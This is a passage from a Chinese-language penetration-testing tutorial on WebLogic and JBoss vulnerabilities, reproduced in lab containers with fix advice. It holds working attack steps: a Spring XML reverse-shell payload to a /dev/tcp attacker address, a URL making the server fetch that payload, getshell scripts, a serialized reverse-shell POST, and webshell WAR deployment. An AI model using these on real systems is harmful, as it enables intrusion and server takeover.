method=\"start\"\/><\/void>\n<\/work:WorkContext>\n<\/soapenv:Header>\n<soapenv:Body>\n<asy:onAsyncDelivery\/>\n<\/soapenv:Body><\/soapenv:Envelope><\/code><\/pre>\n\u8fde\u63a5\u540e\u95e8<\/p>\n
<\/p>\n
\u4fee\u590d\u5efa\u8bae<\/h3>\n
\u7981\u7528bea_wls9_async_response\u7ec4\u4ef6<\/p>\n
\u5220\u9664wls9_async_response\u7684war\u5305\u5e76\u91cd\u542f<\/p>\n
\u7981\u6b62\u8bbf\u95ee \/_async\/* \u8def\u5f84<\/p>\n
4\u3001WebLogic T3\u534f\u8bae\u53cd\u5e8f\u5217\u5316\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e(CVE-2018-2628)<\/h2>\n\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n
Weblogic Server\u4e2d\u7684RMI \u901a\u4fe1\u4f7f\u7528T3\u534f\u8bae\u5728Weblogic Server\u548c\u5176\u5b83Java\u7a0b\u5e8f\uff08\u5ba2\u6237\u7aef\u6216\u8005\u5176\u5b83Weblogic Server\u5b9e\u4f8b\uff09\u4e4b\u95f4\u4f20\u8f93\u6570\u636e, \u670d\u52a1\u5668\u5b9e\u4f8b\u4f1a\u8ddf\u8e2a\u8fde\u63a5\u5230\u5e94\u7528\u7a0b\u5e8f\u7684\u6bcf\u4e2aJava\u865a\u62df\u673a\uff08JVM\uff09\u4e2d,\u5e76\u521b\u5efaT3\u534f\u8bae\u901a\u4fe1\u8fde\u63a5, \u5c06\u6d41\u91cf\u4f20\u8f93\u5230Java\u865a\u62df\u673a. T3\u534f\u8bae\u5728\u5f00\u653eWebLogic\u63a7\u5236\u53f0\u7aef\u53e3\u7684\u5e94\u7528\u4e0a\u9ed8\u8ba4\u5f00\u542f. \u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7T3\u534f\u8bae\u53d1\u9001\u6076\u610f\u7684\u7684\u53cd\u5e8f\u5217\u5316\u6570\u636e, \u8fdb\u884c\u53cd\u5e8f\u5217\u5316, \u5b9e\u73b0\u5bf9\u5b58\u5728\u6f0f\u6d1e\u7684weblogic\u7ec4\u4ef6\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u653b\u51fb<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h3>\n
<\/p>\n
\u4e0b\u8f7dpoc<\/p>\n
git clone https:\/\/github.com\/jas502n\/CVE-2018-2628.git<\/a><\/p>\n\u8fdb\u5165CVE-2018-2628\u76ee\u5f55\u6267\u884cgetshell\u547d\u4ee4<\/p>\n
python CVE-2018-2628-Getshell.py 192.168.0.159 47136 shell.jsp<\/p>\n
python CVE-2018-2628-Getshell.py ip port shell.jsp<\/p>\n
<\/p>\n
\u6f0f\u6d1e\u4fee\u590d<\/h3>\n
1.\u53ca\u65f6\u66f4\u65b0\u8865\u4e01<\/p>\n
2.\u7981\u7528T3\u534f\u8bae<\/p>\n
3.\u7981\u6b62T3\u7aef\u53e3\u5bf9\u5916\u5f00\u653e, \u6216\u8005\u9650\u5236\u53ef\u8bbf\u95eeT3\u7aef\u53e3\u7684IP\u6765\u6e90<\/p>\n
5\u3001WebLogic CVE-2018-2894\u6587\u4ef6\u4efb\u610f\u4e0a\u4f20<\/h2>\n\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n
Weblogic\u7ba1\u7406\u7aef\u672a\u6388\u6743\u7684\u4e24\u4e2a\u9875\u9762\u5b58\u5728\u4efb\u610f\u4e0a\u4f20jsp\u6587\u4ef6\u6f0f\u6d1e\uff0c\u8fdb\u800c\u83b7\u53d6\u670d\u52a1\u5668\u6743\u9650\u3002<\/p>\n
Oracle 7\u6708\u66f4\u65b0\u4e2d\uff0c\u4fee\u590d\u4e86Weblogic Web Service Test Page\u4e2d\u4e00\u5904\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\uff0cWeb ServiceTest Page \u5728 \u2018\u751f\u4ea7\u6a21\u5f0f\u2019 \u4e0b\u9ed8\u8ba4\u4e0d\u5f00\u542f\uff0c\u6240\u4ee5\u8be5\u6f0f\u6d1e\u6709\u4e00\u5b9a\u9650\u5236\u3002\u4e24\u4e2a\u9875\u9762\u5206\u522b \u4e3a\/ws_utc\/begin.do\u3001\/ws_utc\/config.do<\/p>\n
\u5f71\u54cd\u7248\u672c<\/h3>\n
weblogic 10.3.6.0\u3001weblogic 12.1.3.0\u3001weblogic 12.2.1.2\u3001weblogic 12.2.1.3<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h3>\n
\u6253\u5f00vulhub\u91cc\u7684docker\u73af\u5883<\/p>\n
cd \/vulhub\/weblogic<\/p>\n
sudo apt install docker-compose \u6ca1\u6709\u53ef\u4ee5\u5148\u5b89\u88c5\u8fd9\u4e2a\u7ec4\u4ef6<\/p>\n
sudo docker-compose up -d<\/p>\n
<\/p>\n
http:\/\/192.168.0.159:7001\/console\/login\/LoginForm.jsp<\/a><\/p>\n\u83b7\u53d6\u8d26\u53f7\u548c\u5bc6\u7801<\/p>\n
sudo docker-compose logs | grep password<\/p>\n
weblogic dojvLfj3<\/p>\n
<\/p>\n
\u4fdd\u5b58 \u8fdb\u5165\u5f00\u53d1\u6a21\u5f0f<\/p>\n
\u5f00\u53d1\u73af\u5883\u4e0b\u7684\u6d4b\u8bd5\u9875\u6709\u4e24\u4e2a\uff0c\u5206\u522b\u4e3a config.do \u548c begin.do<\/p>\n
\u9996\u5148\u8fdb\u5165 config.do \u6587\u4ef6\u8fdb\u884c\u8bbe\u7f6e\uff0c\u5c06\u76ee\u5f55\u8bbe\u7f6e\u4e3a ws_utc \u5e94\u7528\u7684\u9759\u6001\u6587\u4ef6css\u76ee\u5f55\uff0c\u8bbf\u95ee\u8fd9\u4e2a\u76ee\u5f55\u662f\u65e0<\/p>\n
\u9700\u6743\u9650\u7684\uff0c\u8fd9\u4e00\u70b9\u5f88\u91cd\u8981\u3002<\/p>\n
\u6765\u5230\u8fd9\u4e2a\u9875\u9762<\/p>\n
http:\/\/192.168.0.159:7001\/ws_utc\/config.do<\/a><\/p>\n<\/p>\n
\u8bbe\u7f6e\u5de5\u4f5c\u76ee\u5f55<\/p>\n
\/u01\/oracle\/user_projects\/domains\/base_domain\/servers\/AdminServer\/tmp\/_WL_internal\/com.oracle.webservices.wls.ws-testclient-app-wls\/4mcj4y\/war\/css<\/p>\n
\u70b9\u51fb\u6dfb\u52a0\u540e\u4e0a\u4f20\u4e00\u4e2ajsp<\/p>\n
<\/p>\n
\u63d0\u4ea4\u4e4b\u540e\u70b9\u51fbF12\u5ba1\u67e5\u5143\u7d20\u5f97\u5230jsp\u4e0a\u4f20\u540e\u7684\u65f6\u95f4\u6233<\/p>\n
\u8bbf\u95ee\u8def\u5f84<\/p>\n
http:\/\/192.168.0.159:7001\/ws_utc\/css\/config\/keystore\/1631163729917_shell.jsp<\/a><\/p>\n\u8fd9\u91cc\u6211\u4eec\u5728\u5bf9 begin.do \u672a\u6388\u6743\u8bbf\u95ee\u8fdb\u884c\u5229\u7528\u3002\u8bbf\u95eehttp:\/\/192.168.0.159:7001\/ws_utc\/begin.do<\/a>\uff0c\u4e0a\u4f20\u4e00\u4e2ajsp<\/p>\n<\/p>\n
\u70b9\u51fb\u63d0\u4ea4\uff0c\u8fd9\u91cc\u8f89\u663e\u793a\u4e00\u4e2aerror\u4e0d\u7528\u7ba1\u5b83\uff0cF12\u8fdb\u5165\u7f51\u7edc\uff0c\u7136\u540e\u7b5b\u9009POST\u65b9\u6cd5\uff0c\u5f97\u5230\u4e00\u4e2ajsp\u7684\u8def\u5f84<\/p>\n
<\/p>\n
\u6784\u9020\u5f97\u5230http:\/\/192.168.0.159:7001\/ws_utc\/css\/upload\/RS_Upload_2021-09-09_05-08-33_853\/impo<\/a>rt_file_name_z.jsp\uff0c\u51b0\u874e\u8fde\u63a5\u5373\u53ef<\/p>\n\u4fee\u590d\u65b9\u6848<\/h3>\n
1.\u5347\u7ea7 \u8bbe\u7f6e\u5f3a\u53e3\u4ee4<\/p>\n
6\u3001CVE-2020-14882 WebLogic\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e<\/h2>\n\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n
2020\u5e7410\u670828\u65e5\uff0cOracle\u53d1\u5e03\u768410\u6708\u5b89\u5168\u66f4\u65b0\u4e2d\u7684Oracle WebLogic Server \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2020-14882\uff09POC\u88ab\u516c\u5f00\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u53d1\u9001\u6076\u610f\u7684HTTP GET \u8bf7\u6c42\u3002\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u53ef\u5728\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u60c5\u51b5\u4e0b\u63a7\u5236 WebLogic Server Console \uff0c\u5e76\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002<\/p>\n
2020\u5e7410\u670829\u65e5, Oracle\u53d1\u5e03\u7684\u6f0f\u6d1e\u8865\u4e01CVE-2020-14882\u5b58\u5728\u53ef\u7ed5\u8fc7\u76840day\u6f0f\u6d1e\u3002\u5373\u5728Weblogic\u8865\u4e01\u66f4\u65b0\u5b8c\u6210\u540e\uff0c\u653b\u51fb\u8005\u4ecd\u53ef\u7ed5\u8fc7WebLogic\u540e\u53f0\u767b\u5f55\u7b49\u9650\u5236\uff0c\u5e76\u63a7\u5236Weblogic\u670d\u52a1\u5668\u3002<\/p>\n
\u5f71\u54cd\u7248\u672c<\/h3>\n
Oracle Weblogic Server 10.3.6.0.0<\/p>\n
Oracle Weblogic Server 12.1.3.0.0<\/p>\n
Oracle Weblogic Server 12.2.1.3.0<\/p>\n
Oracle Weblogic Server 12.2.1.4.0<\/p>\n
Oracle Weblogic Server 14.1.1.0.0<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h3>\n
\u9996\u5148\u8fdb\u5165CVE-2020-14882\u7684docker\u73af\u5883<\/p>\n
sudo docker-compose up -d<\/p>\n
\u6784\u9020url \u8fbe\u5230\u672a\u6388\u6743\u767b\u5f55<\/p>\n
http:\/\/192.168.0.159:7001\/console\/images\/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.J\nMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29<\/code><\/pre>\n<\/p>\n
\u8bbf\u95ee\u5373\u53ef\u8fdb\u5165\u540e\u53f0\uff0c\u8fbe\u5230\u672a\u6388\u6743\u8bbf\u95ee\u7684\u6548\u679c<\/p>\n
\u4f46\u662f\u8fd9\u91cc\u6ca1\u6709\u90e8\u7f72\u5b89\u88c5\u7684\u6309\u94ae\uff0c\u4e5f\u5c31\u662f\u8bf4\u4e0d\u80fd\u50cf\u5e38\u89c4\u8fdb\u5165\u540e\u53f0\u540e\u5199shell\u8fdb\u53bb\uff0c\u8fd9\u91cc\u5c31\u9700\u8981\u7528\u5230\u8fdc\u7a0b\u52a0\u8f7d<\/p>\n
XML\u6587\u4ef6\u62ffshell<\/p>\n
\u9996\u5148\u6d4b\u8bd5\u4ee5\u4e0b\u6f0f\u6d1e\u4ee3\u7801\u6267\u884c\u662f\u5426\u6210\u529f\uff0c\u5728\/tmp\/\u4e0b\u521b\u5efa\u4e00\u4e2atest\u6587\u4ef6\u5939<\/p>\n
sudo docker exec -it cve202014882_weblogic_1 \/bin\/bash<\/p>\n
\u8fd9\u91cc\u521b\u5efa\u4e00\u4e2axml\u6587\u4ef6\uff0c\u8fd8\u662f\u4f7f\u7528bash\u547d\u4ee4\u5f97\u5230\u53cd\u5f39shell<\/p>\n
<\/p>\n
# reverse-bash.xml\n<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\nxmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\nxsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\nhttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n<bean id=\"pb\" class=\"java.lang.ProcessBuilder\" init-method=\"start\">\n<constructor-arg>\n<list>\n<value>\/bin\/bash<\/value>\n<value>-c<\/value>\n<value><![CDATA[bash -i >& \/dev\/tcp\/192.168.0.182\/9999 0>&1]]><\/value>\n<\/list>\n<\/constructor-arg>\n<\/bean>\n<\/beans><\/code><\/pre>\nnc\u5f00\u542f\u76d1\u542c\u7aef\u53e3\uff0c\u8bbf\u95ee<\/p>\n
nc -lvnp 9999<\/p>\n
http:\/\/192.168.0.159:7001\/console\/images\/%252E%252E%252Fconsole.portal?\n_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.c\nontext.support.ClassPathXmlApplicationContext(\"http:\/\/192.168.0.182\/reverse-\nbash.xml\")<\/code><\/pre>\n\u4fee\u590d\u65b9\u6848<\/h3>\n
\u4fee\u590d\u5efa\u8bae<\/p>\n
\u5b89\u88c5\u5b98\u65b9\u6700\u65b0\u8865\u4e01\u8fdb\u884c\u5347\u7ea7<\/p>\n
https:\/\/www.oracle.com\/security-alerts\/cpuapr2020.html<\/a><\/p>\n\u4e34\u65f6\u63aa\u65bd\uff1a<\/p>\n
\u7531\u4e8e\u8be5\u6f0f\u6d1e\u7684\u8865\u4e01\u5b58\u5728\u88ab\u7ed5\u8fc7\u7684\u98ce\u9669\uff0c\u5efa\u8bae\u4e34\u65f6\u5173\u95ed\u540e\u53f0\/console\/console.portal\u5bf9\u5916\u8bbf\u95ee<\/p>\n
\u4e03\u3001JBOSS<\/h1>\n
JBoss\u662f\u4e00\u4e2a\u57fa\u4e8eJ2EE\u7684\u5f00\u653e\u6e90\u4ee3\u7801\u5e94\u7528\u670d\u52a1\u5668\uff0c\u4ee3\u7801\u9075\u5faaLGPL\u8bb8\u53ef\uff0c\u53ef\u4ee5\u5728\u4efb\u4f55\u5546\u4e1a\u5e94\u7528\u4e2d\u514d\u8d39\u4f7f\u7528\uff1b<\/p>\n
JBoss\u4e5f\u662f\u4e00\u4e2a\u7ba1\u7406EJB\u7684\u5bb9\u5668\u548c\u670d\u52a1\u5668\uff0c\u652f\u6301EJB 1.1\u3001EJB 2.0\u548cEJB3\u89c4\u8303\u3002\u4f46JBoss\u6838\u5fc3\u670d\u52a1\u4e0d\u5305\u62ec\u652f\u6301servlet\/JSP\u7684WEB\u5bb9\u5668\uff0c\u4e00\u822c\u4e0eTomcat\u6216Jetty\u7ed1\u5b9a\u4f7f\u7528\u3002\u5728J2EE\u5e94\u7528\u670d\u52a1\u5668\u9886\u57df\uff0cJBoss\u662f\u53d1\u5c55\u6700\u4e3a\u8fc5\u901f\u7684\u5e94\u7528\u670d\u52a1\u5668\u3002\u7531\u4e8eJBoss\u9075\u5faa\u5546\u4e1a\u53cb\u597d\u7684LGPL\u6388\u6743\u5206\u53d1\uff0c\u5e76\u4e14\u7531\u5f00\u6e90\u793e\u533a\u5f00\u53d1\uff0c\u8fd9\u4f7f\u5f97JBoss\u5e7f\u4e3a\u6d41\u884c<\/p>\n\n\u76ee\u5f55 \u63cf\u8ff0<\/span><\/strong><\/summary>\nbin \u542f\u52a8\u548c\u5173\u95edJBoss \u7684\u811a\u672c<\/span><\/p>\nclient \u5ba2\u6237\u7aef\u4e0eJBoss \u901a\u4fe1\u6240\u9700\u7684Java \u5e93\uff08JARs\uff09<\/span><\/p>\ndocs \u914d\u7f6e\u7684\u6837\u672c\u6587\u4ef6\uff08\u6570\u636e\u5e93\u914d\u7f6e\u7b49\uff09<\/span><\/p>\ndocs\/dtd \u5728JBoss \u4e2d\u4f7f\u7528\u7684\u5404\u79cdXML \u6587\u4ef6\u7684DTD \u3002<\/span><\/p>\nlib \u4e00\u4e9bJAR\uff0cJBoss \u542f\u52a8\u65f6\u52a0\u8f7d\uff0c\u4e14\u88ab\u6240\u6709JBoss \u914d\u7f6e\u5171\u4eab\u3002\uff08\u4e0d\u8981\u628a\u4f60\u7684\u5e93\u653e\u5728\u8fd9\u91cc\uff09<\/span><\/p>\nserver \u5404\u79cdJBoss \u914d\u7f6e\u3002\u6bcf\u4e2a\u914d\u7f6e\u5fc5\u987b\u653e\u5728\u4e0d\u540c\u7684\u5b50\u76ee\u5f55\u3002\u5b50\u76ee\u5f55\u7684\u540d\u5b57\u8868\u793a\u914d\u7f6e\u7684\u540d\u5b57\u3002JBoss \u5305\u542b3<\/span><\/p>\n\u4e2a\u9ed8\u8ba4\u7684\u914d\u7f6e\uff1aminimial\uff0cdefault \u548call\uff0c\u5728\u4f60\u5b89\u88c5\u65f6\u53ef\u4ee5\u8fdb\u884c\u9009\u62e9\u3002<\/span><\/p>\nserver\/all JBoss \u7684\u5b8c\u5168\u914d\u7f6e\uff0c\u542f\u52a8\u6240\u6709\u670d\u52a1\uff0c\u5305\u62ec\u96c6\u7fa4\u548cIIOP \u3002(\u672c\u6559\u7a0b\u5c31\u91c7\u7528\u6b64\u914d\u7f6e)<\/span><\/p>\nserver\/default JBoss \u7684\u9ed8\u8ba4\u914d\u7f6e\u3002\u5728\u6ca1\u6709\u5728JBoss \u547d\u4ee4\u822a\u4e2d\u6307\u5b9a\u914d\u7f6e\u540d\u79f0\u65f6\u4f7f\u7528\u3002(\u672c\u6559\u7a0b\u6ca1\u6709\u5b89\u88c5\u6b64\u914d<\/span><\/p>\n\u7f6e\uff0c\u5982\u679c\u4e0d\u6307\u5b9a\u914d\u7f6e\u540d\u79f0\uff0c\u542f\u52a8\u5c06\u4f1a\u51fa\u9519)<\/span><\/p>\nserver\/all\/conf JBoss \u7684\u914d\u7f6e\u6587\u4ef6\u3002<\/span><\/p>\nserver\/all\/data JBoss \u7684\u6570\u636e\u5e93\u6587\u4ef6\u3002\u6bd4\u5982\uff0c\u5d4c\u5165\u7684\u6570\u636e\u5e93\uff0c\u6216\u8005JBossMQ \u3002<\/span><\/p>\nserver\/all\/deploy JBoss \u7684\u70ed\u90e8\u7f72\u76ee\u5f55\u3002\u653e\u5230\u8fd9\u91cc\u7684\u4efb\u4f55\u6587\u4ef6\u6216\u76ee\u5f55\u4f1a\u88abJBoss \u81ea\u52a8\u90e8\u7f72\u3002EJB\u3001WAR \u3001<\/span><\/p>\nEAR\uff0c\u751a\u81f3\u670d\u52a1\u3002<\/span><\/p>\nserver\/all\/lib \u4e00\u4e9bJAR\uff0cJBoss \u5728\u542f\u52a8\u7279\u5b9a\u914d\u7f6e\u65f6\u52a0\u8f7d\u4ed6\u4eec\u3002(default \u548cminimial \u914d\u7f6e\u4e5f\u5305\u542b\u8fd9\u4e2a\u548c\u4e0b\u9762<\/span><\/p>\n\u4e24\u4e2a\u76ee\u5f55\u3002)<\/span><\/p>\nserver\/all\/log JBoss \u7684\u65e5\u5fd7\u6587\u4ef6<\/span><\/p>\nserver\/all\/tmp JBoss \u7684\u4e34\u65f6\u6587\u4ef6<\/span><\/p>\n<\/details>\n1\u3001JMX Console\u672a\u6388\u6743\u8bbf\u95eeGetshell<\/h2>\n\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n
\u6b64\u6f0f\u6d1e\u4e3b\u8981\u662f\u7531\u4e8eJBoss\u4e2d\/jmx-console\/HtmlAdaptor\u8def\u5f84\u5bf9\u5916\u5f00\u653e\uff0c\u5e76\u4e14\u6ca1\u6709\u4efb\u4f55\u8eab\u4efd\u9a8c\u8bc1\u673a\u5236\uff0c\u5bfc\u81f4\u653b\u51fb\u8005\u53ef\u4ee5\u8fdb\u2f0a\u5230jmx\u63a7\u5236\u53f0\uff0c\u5e76\u5728\u5176\u4e2d\u6267\u2f8f\u4efb\u4f55\u529f\u80fd<\/p>\n
\u5f71\u54cd\u7248\u672c<\/h3>\n
Jboss4.x\u4ee5\u4e0b<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h3>\n
Jboxx4.x \/jmx-console\/ \u540e\u53f0\u5b58\u5728\u672a\u6388\u6743\u8bbf\u95ee\uff0c\u8fdb\u5165\u540e\u53f0\u540e\uff0c\u53ef\u76f4\u63a5\u90e8\u7f72 war \u5305Getshell\u3002\u82e5\u9700\u767b\u5f55\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u7206\u7834\u5f31\u53e3\u4ee4\u767b\u5f55<\/p>\n
<\/p>\n
\u7136\u540e\u627e\u5230jboss.deployment\uff08jboss \u81ea\u5e26\u7684\u90e8\u7f72\u529f\u80fd\uff09\u4e2d\u7684flavor=URL,type=DeploymentScanner\u70b9\u8fdb\u53bb\uff08\u901a\u8fc7 url \u7684\u65b9\u5f0f\u8fdc\u7a0b\u90e8\u7f72\uff09<\/p>\n
<\/p>\n
\u4e5f\u53ef\u4ee5\u8f93\u5165url\u8fdb\u884c\u6b64\u9875\u9762<\/p>\n
http:\/\/192.168.0.179:8080\/jmx-console\/HtmlAdaptor?<\/a><\/p>\naction=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL<\/p>\n
\u627e\u5230\u9875\u9762\u4e2d\u7684void addURL()\u9009\u9879\u6765\u8fdc\u7a0b\u52a0\u8f7dwar\u5305\u6765\u90e8\u7f72\u3002<\/p>\n
\u586b\u5199 war \u540e\u95e8\u7684\u7f51\u5740<\/p>\n
http:\/\/192.168.0.180:91\/shell.war<\/a><\/p>\n\u8fd4\u56de\u5230\u521a\u8fdb\u5165jmx-console\u7684\u9875\u9762\uff0c\u627e\u5230 jboss.web.deployment\uff0c\u5982\u4e0b\u8bf4\u660e\u90e8\u7f72\u6210\u529f\u3002\u5982\u679c\u6ca1\u663e\u793a\uff0c\u591a\u5237\u65b0\u51e0\u6b21\u9875\u9762\u6216\u8005\u7b49\u4f1a\u513f\uff0c\u76f4\u5230\u770b\u5230\u6709\u90e8\u7f72\u7684war\u5305\u5373\u53ef<\/p>\n
http:\/\/192.168.0.179:8080\/jmx-console\/<\/a><\/p>\n<\/p>\n
\u8bbf\u95ee\u540e\u95e8\u5373\u53ef<\/p>\n
http:\/\/192.168.0.179:8080\/shell\/shell.jsp<\/a><\/p>\n<\/p>\n
\u4fee\u590d\u65b9\u6848<\/h3>\n
1.\u5347\u7ea7jboss<\/p>\n
2.\u5173\u95edjmx-console\u548cweb-console\uff0c\u63d0\u9ad8\u5b89\u5168\u6027<\/p>\n
2\u3001JBoss 5.x\/6.x \u53cd\u5e8f\u5217\u5316\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff08CVE-2017-12149\uff09<\/h2>\n\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n
\u5728Red Hat Enterprise Application Platform 5.2\u9644\u5e26\u7684Jboss Application Server\u4e2d\uff0c\u53d1\u73b0HTTP Invoker\u7684ReadOnlyAccessFilter\u4e2d\u7684doFilter\u65b9\u6cd5\u4e0d\u9650\u5236\u5bf9\u5176\u6267\u884c\u53cd\u5e8f\u5217\u5316\u7684\u7c7b\uff0c\u4ece\u800c\u4f7f\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u7cbe\u5fc3\u5236\u4f5c\u7684\u5e8f\u5217\u5316\u6570\u636e\u6267\u884c\u4efb\u610f\u4ee3\u7801<\/p>\n
\u5f71\u54cd\u7248\u672c<\/h3>\n
\u5f71\u54cd\u7248\u672c\uff1a5.x\/6.x<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h3>\n
\u9996\u5148\u67e5\u770bjboss\u7248\u672c<\/p>\n
<\/p>\n
\u8be5\u6f0f\u6d1e\u51fa\u73b0\u5728\/invoker\/readonly\u4e2d \uff0c\u670d\u52a1\u5668\u5c06\u7528\u6237post\u8bf7\u6c42\u5185\u5bb9\u8fdb\u884c\u53cd\u5e8f\u5217\u5316<\/p>\n
\u7528\u5de5\u5177\u6765\u9a8c\u8bc1\uff0c\u5728\u9a8c\u8bc1\u4e4b\u524d\u6211\u4eec\u53ef\u4ee5\u8bbf\u95ee\u8def\u5f84\u8fdb\u884c\u521d\u6b65\u5224\u65ad<\/p>\n
url:\/\/invoker\/readonly,\u770b\u670d\u52a1\u5668\u8fd4\u56de\u60c5\u51b5\u5982\u4e0b\u5219\u8bf4\u660e\u6f0f\u6d1e\u5b58\u5728<\/p>\n
<\/p>\n
\u4e5f\u53ef\u4ee5\u4f7f\u7528\u5de5\u5177\u8fdb\u884c\u68c0\u6d4b DeserializeExploit \u5982\u679c\u6210\u529f\u76f4\u63a5\u4e0a\u4ea7webshell\u5373\u53ef<\/p>\n
https:\/\/cdn.vulhub.org\/deserialization\/DeserializeExploit.jar<\/a><\/p>\n<\/p>\n
\u4f7f\u7528JavaDeserH2HC\u8fdb\u884c\u53cd\u5f39shell \u4e0b\u8f7d\u5730\u5740 https:\/\/github.com\/joaomatosf\/JavaDeserH2HC<\/a><\/p>\n\u5728kali\u4e0a\u5b89\u88c5jdk8 \u8fd9\u4e2a\u662f\u5b89\u88c5\u597d\u7684\u622a\u56fe<\/p>\n
javac -version &&java -version<\/p>\n
<\/p>\n
\u521b\u5efaclass\u6587\u4ef6<\/p>\n
javac -cp .:commons-collections-3.2.1.jar<\/p>\n
ReverseShellCommonsCollectionsHashMap.java<\/p>\n
\u521b\u5efa\u53cd\u5e8f\u5217\u5316\u6587\u4ef6<\/p>\n
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap<\/p>\n
192.168.0.180:9999<\/p>\n
\u76d1\u542ckali 9999\u7aef\u53e3<\/p>\n
nc -lvnp 9999<\/p>\n
psot\u63d0\u4ea4<\/p>\n
curl http:\/\/192.168.0.179:8080\/invoker\/readonly<\/a> –data-binary<\/p>\n@ReverseShellCommonsCollectionsHashMap.ser<\/p>\n
<\/p>\n
\u5e8f\u5217\u5316\u6587\u4ef6\u751f\u6210\u5b8c\u6210\uff0c\u76d1\u542c\u672c\u57309999\u7aef\u53e3 \u7528curl\u63d0\u4ea4post\u5305<\/p>\n
<\/p>\n
\u4fee\u590d\u65b9\u6848<\/h3>\n
1.\u4e0d\u9700\u8981 http-invoker.sar \u7ec4\u4ef6\u7684\u7528\u6237\u53ef\u76f4\u63a5\u5220\u9664\u6b64\u7ec4\u4ef6\u3002<\/p>\n
2.\u6dfb\u52a0\u5982\u4e0b\u4ee3\u7801\u81f3 http-invoker.sar \u4e0b web.xml \u7684 security-constraint \u6807\u7b7e\u4e2d\uff0c\u5bf9 http invoker \u7ec4\u4ef6\u8fdb<\/p>\n
\u884c\u8bbf\u95ee\u63a7\u5236\uff1a<\/p>\n
1.\u5347\u7ea7\u65b0\u7248\u672c\u3002<\/p>\n
2.\u5220\u9664 http-invoker.sar \u7ec4\u4ef6\u3002<\/p>\n
3.\u6dfb\u52a0\u5982\u4e0b\u4ee3\u7801\u81f3 http-invoker.sar \u4e0b web.xml \u7684 security-constraint \u6807\u7b7e\u4e2d\uff1a\u7528\u4e8e\u5bf9 http invoker \u7ec4\u4ef6\u8fdb\u884c\u8bbf\u95ee\u63a7\u5236\/*<\/url-pattern><\/p>\n3\u3001Jboss 5.x\/6.x admin-Console\u540e\u53f0\u90e8\u7f72war\u5305Getshell<\/h2>\n\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n
Jboss 5.x\/6.x admin-console\u548cweb-console\u7684\u8d26\u53f7\u5bc6\u7801\u662f\u4e00\u6837\u7684\u3002\u56e0\u6b64\u5f53web-console\u65e0\u6cd5\u90e8\u7f72war\u5305\u65f6\uff0c\u53ef\u4ee5\u4f7f\u7528admin-console\u6765\u90e8\u7f72\u3002\u524d\u63d0\u662f\u5148\u5f97\u5230\u8d26\u53f7\u5bc6\u7801\uff0c\u5bc6\u7801\u4fdd\u5b58\u5728jboss\/server\/default\/conf\/props\/jmx-console-users.properties<\/p>\n
\u5f71\u54cd\u7248\u672c<\/h3>\n
Jboss 5.x\/6.x<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h3>\n
\u5148\u521b\u5efa\u4e00\u4e2a\u5e26\u6709jsp\u6728\u9a6c\u7684war\u5305\uff0c\u9009\u62e9\u4e00\u4e2ashell.jsp\u7684\u6728\u9a6c\uff0c\u5728\u8be5\u5904\u6253\u5f00cmd\u5e76\u6267\u884cjar cvf shell.warshell.jsp\u3002\u4f1a\u5f97\u5230\u4e00\u4e2ashell.war \u6216\u8005\u7528zip \u538b\u7f29\u4e00\u4e2azip\u5305\u6539\u540dshell.war<\/p>\n
\u8fdb\u5165admin-console\u9875\u9762\u540e\u8f93\u5165\u8d26\u53f7\u5bc6\u7801\u767b\u5f55<\/p>\n
\/*<\/url-pattern><\/p>\nhttp:\/\/192.168.0.179:8080\/admin-console\/login.seam?conversationId=2<\/a><\/p>\n<\/p>\n
\u9009\u62e9 Web Application (WAR)->Add New Web Application (WAR)<\/p>\n
<\/p>\n
\u4e0a\u4f20\u540e\u95e8\u6587\u4ef6shell.war<\/p>\n
\u8bbf\u95ee\u540e\u95e8<\/p>\n
<\/p>\n
\u4fee\u590d\u65b9\u6848<\/h3>\n
1.\u8bbe\u7f6e\u9ad8\u5f3a\u5ea6\u53e3\u4ee4<\/p>\n
serverdefaultconfpropsjmx-console-users.properties<\/p>\n
4\u3001JBoss EJBInvokerServlet CVE-2013-4810 \u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e<\/h2>\n\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n
